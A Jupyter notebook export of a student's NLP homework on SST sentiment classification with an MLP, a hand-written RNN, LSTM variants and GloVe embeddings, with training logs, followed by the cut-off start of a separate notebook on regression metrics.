"tensor([[ 3.7857e-04, -3.7395e-03, -6.8773e-05, 3.7857e-04, -3.7395e-03,\n -6.8773e-05, 9.9354e-04, 2.3825e-03, 4.2434e-03, 9.9354e-04,\n 2.3825e-03, 4.2434e-03, 9.9354e-04, 2.3825e-03, 4.2434e-03,\n 9.9354e-04, 2.3825e-03, 4.2434e-03, 9.9354e-04, 2.3825e-03,\n 4.2434e-03, 9.9354e-04, 2.3825e-03, 4.2434e-03],\n [-2.7539e-02, 2.7203e-01, 5.0028e-03, -2.7539e-02, 2.7203e-01,\n 5.0028e-03, -7.2274e-02, -1.7331e-01, -3.0868e-01, -7.2274e-02,\n -1.7331e-01, -3.0868e-01, -7.2274e-02, -1.7331e-01, -3.0868e-01,\n -7.2274e-02, -1.7331e-01, -3.0868e-01, -7.2274e-02, -1.7331e-01,\n -3.0868e-01, -7.2274e-02, -1.7331e-01, -3.0868e-01],\n [ 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00,\n 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00,\n 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00,\n 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00,\n 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00]], device='cuda:0')\n"
]
],
[
[
"> **Problem 3.1** *(2 points)* Properly train a MLP baseline model on SST and report the model's accuracy on the dev data.\n\n> **Problem 3.2** *(2 points)* Implement a recurrent neural network (without using PyTorch's RNN module) with `tanh` activation, and use the output of the RNN at the final time step for the classification. Report the model's accuracy on the dev data.\n\n> **Problem 3.3** *(2 points)* Show that the cross entropy computed above is equivalent to the negative log likelihood of the probability distribution.\n\n> **Problem 3.4 (bonus)** *(1 points)* Why is it numerically unstable if you compute log on top of softmax?",
"_____no_output_____"
],
[
"## (Answer)\n**Problem 3.1.**\n(See the code below.) Validation accuracy of MLP after 10 epochs is 55.40%.\n\n**Problem 3.2.** \n(See the code below.) Validation accuracy of RNN after 10 epochs is 57.49%.\n\n**Problem 3.3.** \nThe cross-entropy computed above is formulated as\n$$ H(p,\\hat{p}) = -\\sum_x \\sum_i p_i(x) \\log \\hat{p}_i(x) $$\nwhere $p$ is the one-hot probability vector of the ground-truth label, and $\\hat{p}$ is the predicted probability distribution. Since $p_i$ is 0 except for the ground-truth label dimension, the above form is equivalent to\n$$ -\\sum_x \\log\\hat{y}(x) $$\nwhich is negative log likelihood (NLL).\n\n**Problem 3.4.**\nSoftmax function computes the exponential term with logit values. However, if the logit values are too large, overflow can happen in our computer, i.e., it is only concentrated on the largest value. Likewise, if the logit values are too small, underflow happens and the values are equally assigned.",
"_____no_output_____"
]
],
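[
[
"A small numerical illustration of the Problem 3.4 answer, added to this write-up: with extreme logits, computing `log(softmax(x))` in two steps produces `-inf`, while the fused `log_softmax` stays finite thanks to the log-sum-exp trick.",
"_____no_output_____"
],
[
"# Why log(softmax(x)) is numerically unstable compared to log_softmax(x)\nimport torch\n\nextreme_logits = torch.tensor([[1000.0, 0.0]])\nnaive = torch.log(torch.softmax(extreme_logits, dim=1))  # second entry underflows to 0, so log gives -inf\nfused = torch.log_softmax(extreme_logits, dim=1)         # stays finite: [0, -1000]\nprint(naive)\nprint(fused)",
"_____no_output_____"
]
],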
[
[
"### Problem 3.1 ###\n\nclass SSTDataset(torch.utils.data.Dataset):\n def __init__(self, split, length=16):\n assert split in ['train', 'validation', 'test']\n self._data = sst_dataset[split]\n self.input_lst, self.label_lst = [], []\n for data in self._data:\n sentence = data['sentence'] \n tokens = sentence.split(' ')\n input_ids = [word2id[word] if word in word2id else 1 for word in tokens] # UNK if word not found\n if len(input_ids) < length:\n input_ids = input_ids + [0] * (length - len(input_ids)) # PAD tokens at the end\n else:\n input_ids = input_ids[:length]\n self.input_lst.append(torch.LongTensor(input_ids))\n\n label = round(data['label'])\n self.label_lst.append(label)\n\n def __getitem__(self, idx):\n return self.input_lst[idx], self.label_lst[idx]\n\n def __len__(self):\n return len(self._data)\n\n\ntrainset = SSTDataset('train')\nvalidset = SSTDataset('validation')\ntrain_loader = torch.utils.data.DataLoader(trainset, batch_size=16, shuffle=True)\nvalid_loader = torch.utils.data.DataLoader(validset, batch_size=16, shuffle=False)\n\nbaseline = Baseline(d=128, length=16).cuda()\ncel = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(baseline.parameters(), lr=0.01)\n\n\nfor epoch in range(10):\n baseline.train()\n avg_loss = 0\n for input, label in train_loader:\n input = input.cuda()\n label = label.cuda()\n logits = baseline(input)\n loss = cel(logits, label)\n avg_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')\n\n baseline.eval()\n acc, count = 0, 0\n for input, label in valid_loader:\n with torch.no_grad():\n input = input.cuda()\n logits = baseline(input)\n _, preds = torch.max(logits, dim=1)\n acc += (preds.cpu().data == label).sum().item()\n count += float(input.size(0))\n acc /= count\n print(f'Epoch {epoch+1}, Valid Acc {acc}')\n\nprint('='*50)\nprint(f'Last Validation Accuracy: {acc}')",
"Epoch 1, Train Loss 0.6926739388860567\nEpoch 1, Valid Acc 0.5485921889191644\nEpoch 2, Train Loss 0.6309732247269555\nEpoch 2, Valid Acc 0.5358764759309719\nEpoch 3, Train Loss 0.5576151426365313\nEpoch 3, Valid Acc 0.5440508628519528\nEpoch 4, Train Loss 0.4595080493541246\nEpoch 4, Valid Acc 0.5286103542234333\nEpoch 5, Train Loss 0.35082442009270415\nEpoch 5, Valid Acc 0.5513169845594914\nEpoch 6, Train Loss 0.2495291709397616\nEpoch 6, Valid Acc 0.5395095367847411\nEpoch 7, Train Loss 0.17458258945955318\nEpoch 7, Valid Acc 0.5376930063578564\nEpoch 8, Train Loss 0.12860913224839204\nEpoch 8, Valid Acc 0.5522252497729337\nEpoch 9, Train Loss 0.09566429610039746\nEpoch 9, Valid Acc 0.5367847411444142\nEpoch 10, Train Loss 0.07502119265468826\nEpoch 10, Valid Acc 0.5504087193460491\n==================================================\nLast Validation Accuracy: 0.5504087193460491\n"
],
[
"### Problem 3.2 ###\n\nclass RNN(nn.Module):\n def __init__(self, seq_length, hidden_dim, embed_dim):\n super(RNN, self).__init__()\n self.seq_length = seq_length\n self.hidden_dim = hidden_dim\n self.embed_dim = embed_dim\n\n self.embedding = nn.Embedding(len(vocab), embed_dim)\n self.linear = nn.Linear(embed_dim + hidden_dim, hidden_dim)\n self.classifier = nn.Linear(hidden_dim, 2)\n self.tanh = nn.Tanh()\n\n def forward(self, input):\n assert self.seq_length == input.size(1) # batch_first\n emb = self.embedding(input)\n h_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n\n for seq in range(self.seq_length):\n x = torch.cat([emb[:, seq, :], h_t], dim=-1)\n h_t = self.tanh(self.linear(x))\n\n out = self.classifier(h_t)\n return out\n\nrnn = RNN(seq_length=16, hidden_dim=64, embed_dim=64).cuda()\ncel = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(rnn.parameters(), lr=0.001)\n\nfor epoch in range(10):\n rnn.train()\n avg_loss = 0\n for input, label in train_loader:\n logits = rnn(input.cuda())\n loss = cel(logits, label.cuda())\n avg_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')\n\n rnn.eval()\n acc, count = 0, 0\n for input, label in valid_loader:\n with torch.no_grad():\n logits = rnn(input.cuda())\n _, preds = torch.max(logits, dim=1)\n acc += (preds.cpu().data == label).sum().item()\n count += float(input.size(0))\n acc /= count\n print(f'Epoch {epoch+1}, Valid Acc {acc}')\n\nprint('='*50)\nprint(f'Last Validation Accuracy: {acc}')",
"Epoch 1, Train Loss 0.7002752028154523\nEpoch 1, Valid Acc 0.5049954586739328\nEpoch 2, Train Loss 0.6841855224375422\nEpoch 2, Valid Acc 0.5549500454132607\nEpoch 3, Train Loss 0.6612656375442105\nEpoch 3, Valid Acc 0.5776566757493188\nEpoch 4, Train Loss 0.6143353563011362\nEpoch 4, Valid Acc 0.6239782016348774\nEpoch 5, Train Loss 0.5568217269601893\nEpoch 5, Valid Acc 0.6021798365122616\nEpoch 6, Train Loss 0.501285749037614\nEpoch 6, Valid Acc 0.6584922797456857\nEpoch 7, Train Loss 0.4489893540460965\nEpoch 7, Valid Acc 0.6575840145322435\nEpoch 8, Train Loss 0.38173778384421647\nEpoch 8, Valid Acc 0.6657584014532243\nEpoch 9, Train Loss 0.3311019776884313\nEpoch 9, Valid Acc 0.6512261580381471\nEpoch 10, Train Loss 0.3220137807676631\nEpoch 10, Valid Acc 0.5749318801089919\n==================================================\nLast Validation Accuracy: 0.5749318801089919\n"
]
],
[
[
"## 4. Text Classification with LSTM and Dropout\n\nReplace your RNN module with an LSTM module. See Lecture slides 05 and 06 for the formal definition of LSTMs. \n\nYou will also use Dropout, which randomly makes each dimension zero with the probability of `p` and scale it by `1/(1-p)` if it is not zero during training. Put it either at the input or the output of the LSTM to prevent it from overfitting.",
"_____no_output_____"
]
],
[
[
"a = torch.FloatTensor([0.1, 0.3, 0.5, 0.7, 0.9])\ndropout = nn.Dropout(0.5) # p=0.5\nprint(dropout(a))",
"tensor([0.0000, 0.6000, 0.0000, 1.4000, 0.0000])\n"
]
],
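[
[
"One more detail worth seeing, added here as an illustration: `Dropout` is only active in training mode. In evaluation mode it is the identity, which is why the training loops in this notebook call `.eval()` on the model before measuring dev accuracy.",
"_____no_output_____"
],
[
"# Dropout behaves differently in train and eval mode\nimport torch\nfrom torch import nn\n\nx = torch.ones(1, 8)\ndrop = nn.Dropout(0.5)\n\ndrop.train()\nprint(drop(x))   # roughly half the entries zeroed, survivors scaled by 1/(1-p) = 2\n\ndrop.eval()\nprint(drop(x))   # identity: the input is returned unchanged",
"_____no_output_____"
]
],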
[
[
"> **Problem 4.1** *(3 points)* Implement and use LSTM (without using PyTorch's LSTM module) instead of vanilla RNN. Report the accuracy on the dev data.\n\n> **Problem 4.2** *(2 points)* Use Dropout on LSTM (either at input or output). Report the accuracy on the dev data.\n\n> **Problem 4.3 (bonus)** *(2 points)* Consider implementing bidirectional LSTM and two layers of LSTM. Concatenate the forward direction output at the final time step and the backward direction output at the first time step for the final classificaiton. Report your accuracy on dev data.",
"_____no_output_____"
],
[
"## (Answer)\n\n**Problem 4.1.**\n(See the code below.) Validation accuracy of LSTM after 10 epochs is 66.94%.\n\n**Problem 4.2.**\n(See the code below.) Validation accuracy of LSTM with Dropout after 10 epochs is 68.76%.\n\n**Problem 4.3.**\n(See the code below.) Validation accuracy of bi-directional stacked (2 layers) LSTM after 10 epochs is 64.03%.",
"_____no_output_____"
]
],
[
[
"### Problem 4.1 ###\n\nimport time\n\nclass LSTM(nn.Module):\n def __init__(self, seq_length, hidden_dim, embed_dim, dropout=False, pretrained=False):\n super(LSTM, self).__init__()\n self.seq_length = seq_length\n self.hidden_dim = hidden_dim\n self.embed_dim = embed_dim\n self.pretrained = pretrained\n\n if not self.pretrained:\n self.embedding = nn.Embedding(len(vocab), embed_dim)\n self.linear_input = nn.Linear(embed_dim + hidden_dim, hidden_dim)\n self.linear_forget = nn.Linear(embed_dim + hidden_dim, hidden_dim)\n self.linear_cell = nn.Linear(embed_dim + hidden_dim, hidden_dim)\n self.linear_output = nn.Linear(embed_dim + hidden_dim, hidden_dim)\n\n self.classifier = nn.Linear(hidden_dim, 2)\n self.sigmoid = nn.Sigmoid()\n self.tanh = nn.Tanh()\n if dropout:\n self.dropout = nn.Dropout(p=0.5)\n else:\n self.dropout = None\n\n def forward(self, input):\n assert self.seq_length == input.size(1) # batch_first\n if not self.pretrained:\n emb = self.embedding(input)\n else:\n emb = input\n h_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n c_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n\n for seq in range(self.seq_length):\n i_t = self.sigmoid(self.linear_input(torch.cat([emb[:, seq, :], h_t], dim=-1)))\n f_t = self.sigmoid(self.linear_forget(torch.cat([emb[:, seq, :], h_t], dim=-1)))\n g_t = self.tanh(self.linear_cell(torch.cat([emb[:, seq, :], h_t], dim=-1)))\n o_t = self.sigmoid(self.linear_output(torch.cat([emb[:, seq, :], h_t], dim=-1)))\n\n c_t = f_t * c_t + i_t * g_t\n h_t = o_t * self.tanh(c_t)\n\n if self.dropout is not None:\n h_t = self.dropout(h_t)\n out = self.classifier(h_t)\n return out\n\nlstm = LSTM(seq_length=16, hidden_dim=64, embed_dim=64).cuda()\ncel = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(lstm.parameters(), lr=0.01)\n\n\nfor epoch in range(10):\n start = time.time()\n lstm.train()\n avg_loss = 0\n for input, label in train_loader:\n logits = lstm(input.cuda())\n loss = cel(logits, label.cuda())\n avg_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n end = time.time() - start\n print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}, Time {end}s')\n\n lstm.eval()\n acc, count = 0, 0\n for input, label in valid_loader:\n with torch.no_grad():\n logits = lstm(input.cuda())\n _, preds = torch.max(logits, dim=1)\n acc += (preds.cpu().data == label).sum().item()\n count += float(input.size(0))\n acc /= count\n print(f'Epoch {epoch+1}, Valid Acc {acc}')\n\nprint('='*50)\nprint(f'Last Validation Accuracy: {acc}')",
"Epoch 1, Train Loss 0.700248077567597, Time 21.331552743911743s\nEpoch 1, Valid Acc 0.5522252497729337\nEpoch 2, Train Loss 0.6394619273670604, Time 21.157572746276855s\nEpoch 2, Valid Acc 0.6267029972752044\nEpoch 3, Train Loss 0.4642184291327937, Time 20.68288016319275s\nEpoch 3, Valid Acc 0.6603088101725704\nEpoch 4, Train Loss 0.32396950177876244, Time 20.515620708465576s\nEpoch 4, Valid Acc 0.667574931880109\nEpoch 5, Train Loss 0.25231142262736345, Time 20.70114278793335s\nEpoch 5, Valid Acc 0.6757493188010899\nEpoch 6, Train Loss 0.2162350971174988, Time 20.935175895690918s\nEpoch 6, Valid Acc 0.6548592188919165\nEpoch 7, Train Loss 0.16316376408049313, Time 21.018038034439087s\nEpoch 7, Valid Acc 0.6821071752951862\nEpoch 8, Train Loss 0.12651554092700323, Time 21.22074818611145s\nEpoch 8, Valid Acc 0.662125340599455\nEpoch 9, Train Loss 0.10965743735288741, Time 20.96744990348816s\nEpoch 9, Valid Acc 0.6693914623069936\nEpoch 10, Train Loss 0.11846032501298634, Time 21.01356315612793s\nEpoch 10, Valid Acc 0.6530426884650318\n==================================================\nLast Validation Accuracy: 0.6530426884650318\n"
],
[
"### Problem 4.2 ###\n\nlstm = LSTM(seq_length=16, hidden_dim=64, embed_dim=64, dropout=True).cuda()\ncel = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(lstm.parameters(), lr=0.01)\n\nfor epoch in range(10):\n lstm.train()\n avg_loss = 0\n for input, label in train_loader:\n logits = lstm(input.cuda())\n loss = cel(logits, label.cuda())\n avg_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')\n\n lstm.eval()\n acc, count = 0, 0\n for input, label in valid_loader:\n with torch.no_grad():\n logits = lstm(input.cuda())\n _, preds = torch.max(logits, dim=1)\n acc += (preds.cpu().data == label).sum().item()\n count += float(input.size(0))\n acc /= count\n print(f'Epoch {epoch+1}, Valid Acc {acc}')\n\nprint('='*50)\nprint(f'Last Validation Accuracy: {acc}')",
"Epoch 1, Train Loss 0.7021140858028712\nEpoch 1, Valid Acc 0.5894641235240691\nEpoch 2, Train Loss 0.6200328616613753\nEpoch 2, Valid Acc 0.6485013623978202\nEpoch 3, Train Loss 0.4675403159767501\nEpoch 3, Valid Acc 0.6966394187102634\nEpoch 4, Train Loss 0.3609386019352893\nEpoch 4, Valid Acc 0.6920980926430518\nEpoch 5, Train Loss 0.28877523076835643\nEpoch 5, Valid Acc 0.6948228882833788\nEpoch 6, Train Loss 0.2440362356791503\nEpoch 6, Valid Acc 0.6939146230699365\nEpoch 7, Train Loss 0.20462624923315612\nEpoch 7, Valid Acc 0.6884650317892824\nEpoch 8, Train Loss 0.18639810670216042\nEpoch 8, Valid Acc 0.6811989100817438\nEpoch 9, Train Loss 0.1740493546571401\nEpoch 9, Valid Acc 0.695731153496821\nEpoch 10, Train Loss 0.15924992400948795\nEpoch 10, Valid Acc 0.6875567665758402\n==================================================\nLast Validation Accuracy: 0.6875567665758402\n"
],
[
"### Problem 4.3 ###\n\nclass BiStackedLSTM(nn.Module):\n def __init__(self, seq_length, hidden_dim, embed_dim, dropout=False):\n super(BiStackedLSTM, self).__init__()\n self.seq_length = seq_length\n self.hidden_dim = hidden_dim\n self.embed_dim = embed_dim\n\n self.embedding = nn.Embedding(len(vocab), embed_dim)\n self.layers = []\n assert embed_dim == hidden_dim # I used the same dimension for convenience\n for layer in range(2):\n layer_dict = {}\n layer_dict['input_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim).cuda()\n layer_dict['forget_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim).cuda()\n layer_dict['cell_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim).cuda()\n layer_dict['output_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim).cuda()\n self.layers.append(layer_dict)\n \n self.classifier = nn.Linear(hidden_dim*2, 2)\n self.sigmoid = nn.Sigmoid()\n self.tanh = nn.Tanh()\n\n if dropout:\n self.dropout = nn.Dropout(p=0.5)\n else:\n self.dropout = None\n\n def forward(self, input):\n assert self.seq_length == input.size(1) # batch_first\n emb = self.embedding(input)\n\n h_t_bi = []\n for direction in [range(self.seq_length), range(self.seq_length)[::-1]]:\n # 1st layer\n all_h_t = []\n h_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n c_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n for seq in direction:\n i_t = self.sigmoid(self.layers[0]['input_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))\n f_t = self.sigmoid(self.layers[0]['forget_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))\n g_t = self.tanh(self.layers[0]['cell_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))\n o_t = self.sigmoid(self.layers[0]['output_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))\n c_t = f_t * c_t + i_t * g_t\n h_t = o_t * self.tanh(c_t)\n if self.dropout is not None:\n h_t = self.dropout(h_t)\n all_h_t.append(h_t)\n # 2nd layer\n h_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n c_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n for seq in direction:\n i_t = self.sigmoid(self.layers[1]['input_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))\n f_t = self.sigmoid(self.layers[1]['forget_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))\n g_t = self.tanh(self.layers[1]['cell_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))\n o_t = self.sigmoid(self.layers[1]['output_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))\n c_t = f_t * c_t + i_t * g_t\n h_t = o_t * self.tanh(c_t)\n if self.dropout is not None:\n h_t = self.dropout(h_t)\n h_t_bi.append(h_t) # last (or first) hidden state\n\n h_t_concat = torch.cat(h_t_bi, dim=-1) # [B, hidden_dim*2]\n out = self.classifier(h_t_concat)\n return out\n\n\nmodel = BiStackedLSTM(seq_length=16, hidden_dim=64, embed_dim=64, dropout=True).cuda()\ncel = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n\nfor epoch in range(10):\n model.train()\n avg_loss = 0\n for input, label in train_loader:\n logits = model(input.cuda())\n loss = cel(logits, label.cuda())\n avg_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')\n\n model.eval()\n acc, count = 0, 0\n for input, label in valid_loader:\n with torch.no_grad():\n logits = model(input.cuda())\n _, preds = torch.max(logits, dim=1)\n acc += (preds.cpu().data == label).sum().item()\n count += float(input.size(0))\n acc /= count\n print(f'Epoch 
{epoch+1}, Valid Acc {acc}')\n\nprint('='*50)\nprint(f'Last Validation Accuracy: {acc}')",
"Epoch 1, Train Loss 0.6937321649955006\nEpoch 1, Valid Acc 0.5785649409627611\nEpoch 2, Train Loss 0.6566966125246291\nEpoch 2, Valid Acc 0.6012715712988193\nEpoch 3, Train Loss 0.5758043701729078\nEpoch 3, Valid Acc 0.6021798365122616\nEpoch 4, Train Loss 0.5019804891129112\nEpoch 4, Valid Acc 0.6121707538601272\nEpoch 5, Train Loss 0.43898056347048686\nEpoch 5, Valid Acc 0.6158038147138964\nEpoch 6, Train Loss 0.399179231696361\nEpoch 6, Valid Acc 0.6521344232515894\nEpoch 7, Train Loss 0.34490792578860613\nEpoch 7, Valid Acc 0.6503178928247049\nEpoch 8, Train Loss 0.2993847786375646\nEpoch 8, Valid Acc 0.6512261580381471\nEpoch 9, Train Loss 0.2646490029872078\nEpoch 9, Valid Acc 0.6457765667574932\nEpoch 10, Train Loss 0.2349852400549342\nEpoch 10, Valid Acc 0.6403269754768393\n==================================================\nLast Validation Accuracy: 0.6403269754768393\n"
]
],
[
[
"## 5. Pretrained Word Vectors\nThe last step is to use pretrained vocabulary and word vectors. The prebuilt vocabulary will replace the vocabulary you built with SST training data, and the word vectors will replace the embedding vectors. You will observe the power of leveraging self-supservised pretrained models.\n\n> **Problem 5.1 (bonus)** *(2 points)* Go to https://nlp.stanford.edu/projects/glove/ and download `glove.6B.zip`. Use these pretrained word vectors to replace word embeddings in your model from 4.2. Report the model's accuracy on the dev data.",
"_____no_output_____"
],
[
"## (Answer)\n\n**Problem 5.1.**\n(See the code below.) Validation accuracy of LSTM using the pretrained embeddings after 10 epochs training is 70.75%. Leveraging the self-supervised pretrained information helps the downstream classification task.",
"_____no_output_____"
]
],
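[
[
"A note added for this write-up: instead of feeding pre-looked-up vectors to the model (as the solution below does), a pretrained matrix can also be wrapped in an `nn.Embedding` layer. This is only a sketch; the small random matrix stands in for the real GloVe matrix so that the cell runs on its own.",
"_____no_output_____"
],
[
"# Sketch: wrap a pretrained embedding matrix in a frozen nn.Embedding layer\nimport numpy as np\nimport torch\nfrom torch import nn\n\npretrained_matrix = np.random.randn(1000, 50).astype(np.float32)  # stand-in for the GloVe matrix\nemb_layer = nn.Embedding.from_pretrained(torch.from_numpy(pretrained_matrix), freeze=True)\nprint(emb_layer.weight.shape)",
"_____no_output_____"
]
],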
[
[
"!wget https://nlp.stanford.edu/data/glove.6B.zip\n!unzip glove.6B.zip",
"--2021-09-26 13:59:12-- https://nlp.stanford.edu/data/glove.6B.zip\nResolving nlp.stanford.edu (nlp.stanford.edu)... 171.64.67.140\nConnecting to nlp.stanford.edu (nlp.stanford.edu)|171.64.67.140|:443... connected.\nHTTP request sent, awaiting response... 301 Moved Permanently\nLocation: http://downloads.cs.stanford.edu/nlp/data/glove.6B.zip [following]\n--2021-09-26 13:59:13-- http://downloads.cs.stanford.edu/nlp/data/glove.6B.zip\nResolving downloads.cs.stanford.edu (downloads.cs.stanford.edu)... 171.64.64.22\nConnecting to downloads.cs.stanford.edu (downloads.cs.stanford.edu)|171.64.64.22|:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 862182613 (822M) [application/zip]\nSaving to: ‘glove.6B.zip’\n\nglove.6B.zip 100%[===================>] 822.24M 5.06MB/s in 2m 42s \n\n2021-09-26 14:01:55 (5.08 MB/s) - ‘glove.6B.zip’ saved [862182613/862182613]\n\nArchive: glove.6B.zip\n inflating: glove.6B.50d.txt \n inflating: glove.6B.100d.txt \n inflating: glove.6B.200d.txt \n inflating: glove.6B.300d.txt \n"
],
[
"### Problem 5.1 - (1) ###\nimport numpy as np\n\nvocab = ['PAD', 'UNK']\nembedding = np.zeros((400002, 300), dtype=np.float32)\nembedding[1,:] = np.random.randn(300) # random number for UNK\nwith open('./glove.6B.300d.txt') as f:\n for i, line in enumerate(f.readlines()):\n vocab.append(line.split(' ')[0])\n embedding[i+2] = np.array(line.split(' ')[1:], dtype=np.float32)\nword2id = {word: id_ for id_, word in enumerate(vocab)}\nprint('Vocabulary size: {}'.format(len(vocab)))",
"Vocabulary size: 400002\n"
],
[
"### Problem 5.1 - (2) ###\n\nclass SSTDataset(torch.utils.data.Dataset):\n def __init__(self, split, length=16):\n assert split in ['train', 'validation', 'test']\n self._data = sst_dataset[split]\n self.input_lst, self.label_lst = [], []\n for data in self._data:\n sentence = data['sentence'] \n tokens = sentence.split(' ')\n input_ids = [word2id[word] if word in word2id else 1 for word in tokens] # UNK if word not found\n if len(input_ids) < length:\n input_ids = input_ids + [0] * (length - len(input_ids)) # PAD tokens at the end\n else:\n input_ids = input_ids[:length]\n self.input_lst.append(torch.tensor(embedding[input_ids])) # use the pretrained embedding\n\n label = round(data['label'])\n self.label_lst.append(label)\n\n def __getitem__(self, idx):\n return self.input_lst[idx], self.label_lst[idx]\n\n def __len__(self):\n return len(self._data)\n\ntrainset = SSTDataset('train')\nvalidset = SSTDataset('validation')\ntrain_loader = torch.utils.data.DataLoader(trainset, batch_size=16, shuffle=True)\nvalid_loader = torch.utils.data.DataLoader(validset, batch_size=16, shuffle=False)",
"_____no_output_____"
],
[
"### Problem 5.1 - (3) ###\n\nlstm = LSTM(seq_length=16, hidden_dim=128, embed_dim=300, dropout=True, pretrained=True).cuda()\ncel = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(lstm.parameters(), lr=0.01)\n\nfor epoch in range(10):\n lstm.train()\n avg_loss = 0\n for input, label in train_loader:\n logits = lstm(input.cuda())\n loss = cel(logits, label.cuda())\n avg_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')\n\n lstm.eval()\n acc, count = 0, 0\n for input, label in valid_loader:\n with torch.no_grad():\n logits = lstm(input.cuda())\n _, preds = torch.max(logits, dim=1)\n acc += (preds.cpu().data == label).sum().item()\n count += float(input.size(0))\n acc /= count\n print(f'Epoch {epoch+1}, Valid Acc {acc}')\n\nprint('='*50)\nprint(f'Last Validation Accuracy: {acc}')",
"Epoch 1, Train Loss 0.6598808100161034\nEpoch 1, Valid Acc 0.7129881925522252\nEpoch 2, Train Loss 0.5778945932506622\nEpoch 2, Valid Acc 0.706630336058129\nEpoch 3, Train Loss 0.5275646816757734\nEpoch 3, Valid Acc 0.7211625794732062\nEpoch 4, Train Loss 0.489664972470271\nEpoch 4, Valid Acc 0.7184377838328792\nEpoch 5, Train Loss 0.46001328106564976\nEpoch 5, Valid Acc 0.7157129881925522\nEpoch 6, Train Loss 0.4412068678728873\nEpoch 6, Valid Acc 0.7247956403269755\nEpoch 7, Train Loss 0.4032142126744383\nEpoch 7, Valid Acc 0.7293369663941871\nEpoch 8, Train Loss 0.39443781687302537\nEpoch 8, Valid Acc 0.7229791099000908\nEpoch 9, Train Loss 0.3683058825994699\nEpoch 9, Valid Acc 0.7120799273387829\nEpoch 10, Train Loss 0.3465916405288914\nEpoch 10, Valid Acc 0.7075386012715713\n==================================================\nLast Validation Accuracy: 0.7075386012715713\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb2a8661d3feaf773956f663afa3712ce9bd8844 | 5,095 | ipynb | Jupyter Notebook | metrics_optimization/regression_metrics.ipynb | alikhanlab/data_science_project_approach | 8b505bce2802003a4e949842b8ddcd2a544a2c92 | [
"MIT"
] | null | null | null | metrics_optimization/regression_metrics.ipynb | alikhanlab/data_science_project_approach | 8b505bce2802003a4e949842b8ddcd2a544a2c92 | [
"MIT"
] | null | null | null | metrics_optimization/regression_metrics.ipynb | alikhanlab/data_science_project_approach | 8b505bce2802003a4e949842b8ddcd2a544a2c92 | [
"MIT"
] | null | null | null | 24.37799 | 144 | 0.535034 | [
[
[
"# Regression Metrics\n\nMetrics covered: \n\n#### 1) MSE, RMSE, R-squared\n\n#### 2) MAE\n\n#### 3) (R)MSPE, MAPE\n\n#### 4) (R)MSLE\n",
"_____no_output_____"
],
[
"#### Notation\n\n",
"_____no_output_____"
],
[
"# MSE: Mean Squared Error\n\n\n\n\n### How to evaluate MSE ?\n\nFirst, you make baseline and check if your model beats this baseline.\n\n`Baseline` - best constant model, it's different for different metrics.\n\nFor `MSE` best constant: `target mean`.\n\nSo just compute MSE baseline, and see if your model beats it.\n\n\n\n",
"_____no_output_____"
],
[
